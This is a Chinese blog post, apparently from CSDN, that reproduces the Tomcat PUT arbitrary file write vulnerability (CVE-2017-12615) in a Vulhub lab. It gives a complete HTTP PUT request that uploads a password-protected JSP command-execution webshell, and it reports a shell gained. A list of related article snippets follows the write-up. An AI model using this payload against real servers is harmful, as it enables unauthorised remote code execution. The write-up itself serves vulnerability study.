Tomcat PUT方法任意文件写入漏洞(CVE-2017-12615)

最新推荐文章于 2024-03-06 22:19:12 发布
最新推荐文章于 2024-03-06 22:19:12 发布
阅读量762 收藏
点赞数
文章标签: tomcat 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/109537205
版权

多积累,等待知识的爆发。加油!
1、漏洞简介
当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。之后,JSP 文件中的代码将能被服务器执行。
2、漏洞影响
Apache Tomcat 7.0.0 – 7.0.81

3.漏洞复现
环境搭建:
在Vulhub搭建就好。搭建完进去看一下配置文件里边的这个漏洞的关键点,
readonly确认是false

在这里插入图片描述
Payload:

PUT /123.jsp/ HTTP/1.1
Host: 靶机ip:8080
User-Agent:  JNTASS
DNT:1
Connection: close
Content-Length: 660

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp
+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

利用burpsuite发送payload
在这里插入图片描述
看到返回响应码201,说明上传成功了

在这里插入图片描述
传一个jsp马,
在这里插入图片描述

成功getshell

在这里插入图片描述

Lin冲啊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1050
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件
Tomcat PUT方法任意文件漏洞CVE-2017-12615
haha1314的博客
07-25 1779
Tomcat PUT方法任意文件漏洞CVE-2017-12615Tomcat版本:8.5.19 Apache Tomcat 7.0.0 - 7.0.79 漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件: <servlet> <servlet-name>default</servlet-name> ...
Nginx越界读取缓存漏洞 CVE-2017-7529
03-13
Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。 如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容
Tomcat漏洞详解
最新发布
m0_64481831的博客
03-06 1487
Tomcat是一种轻量级的web服务器,主要负责运行jsp和Servlet具有任意文件写入漏洞:主要影响7.0-7.8左右,原因是因为配置不当问题(conf/web.xml文件的readonly参数定义为false),导致可以使用PUT方法进行任意文件上传。jsp绕过方法有斜杠绕过、空格绕过和::$DATA绕过(后两者都需要在Windows下)具有文件包含漏洞:主要影响6和8版本,7和9版本有少数;原因是因为AJP协议存在缺陷而导致攻击者可以构造任意参数来进行任意文件包含和读取文件
hikvision_CVE-2017-7921配置文件解密.rar
05-20
该程序可以提取由于授权问题影响的多款Hikvision产品的configfile文件中的管理员账号密码。 具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
cve-2017-12615_cmd.py
04-26
CVE-2017-12615的稀有检测脚本,方便使用和测试,本脚本请谨慎使用!
漏洞复现】Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 507
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
Tomcat PUT方法任意文件漏洞(CVE-2017-12615)
来到了学渣的博客
08-18 1551
Tomcat启用了HTTP PUT请求方法并且将 readonly 初始化参数由默认值设置为 false,就能执行任意文件写入漏洞 Tomcat 7.x版本内web.xml配置文件内默认配置无readonly参数,需要手工添加,所以默认配置条件下不受此漏洞影响。 配置文件为 \conf\web.xml 利用vulhub搭建漏洞环境 目录为tomcat/CVE-2017-12615 环境启动成功 直接构造如下poc PUT /shell1.jsp/ HTTP/1.1 Host:目标ip Accep
Tomcat PUT 方法任意文件漏洞CVE-2017-12615)复现
weixin_47498728的博客
01-06 718
tomcat本身不允许上传 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上传。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上传并保存。
【vulhub漏洞复现】通过 PUT 方法Tomcat 任意写入文件漏洞 (CVE-2017-12615)-02
书山上的云的博客
01-11 3560
一、漏洞原理 Tomcat设置了写权限(readonly=false),导致我们可以向服务器写入文件CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的)。 <servlet> <servlet-name>default</servlet-name> <servlet
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
Tomcat漏洞利用实践
yyj1781572的博客
04-02 1202
本实验将带领大家实际操作攻击tomcat以及如何修复其漏洞。在配置Tomcat的时候使用了常用的用户名和弱口令,导致Tomcat可被攻击者登陆,并利用manager中的war部署功能上传恶意脚本最终导致服务器沦陷。
CVE-2017-12615 Tomcat PUT方法任意文件漏洞复现
永远是少年
01-05 914
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2017-12615 Tomcat PUT方法任意文件漏洞复现。 一、漏洞简介与环境搭建 二、漏洞复现实战
TOMCAT PUT方法任意文件(CVE-2017-12615)-靶场复现
m0_66376444的博客
04-06 566
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。2、修改请求协议PUT加文件名,在请求主体内写入可执行代码,点击发送。本次测试版本:Tomcat版本:8.5.19。
CTF-PUT上传漏洞
不知名白帽的博客
05-27 730
CTF-PUT上传漏洞,实验环境:kali(192.168.20.128),靶机(192.168.20.137)。进行信息探测,漏洞扫描未发现有效信息后,测试PUT漏洞,发现存在PUT漏洞,下载插件Poster(RESTClient),然后上传大马反弹shell
文件上传漏洞-02】利用PUT方法上传文件—以Apache为例
m0_64378913的博客
05-31 6503
目录1 http协议请求方法概述2 Apache开启PUT请求方法的过程2.1 实验环境2.3 查询已开启的请求类型2.3 开启put方法3 文件上传漏洞利用3.1 上传PHP探针3.2 上传WebShell4 总结参考文章 1 http协议请求方法概述 具体http/https协议及通信过程可以参考文章《【基础协议】HTTP/HTTPS协议及其工作流程》 常见的请求方法及概述 GET:向特定的资源发出请求。 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。PO
cve-2017-12615漏洞复现
06-28
cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现该漏洞,需要满足以下条件: 1. 目标服务器上运行的是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值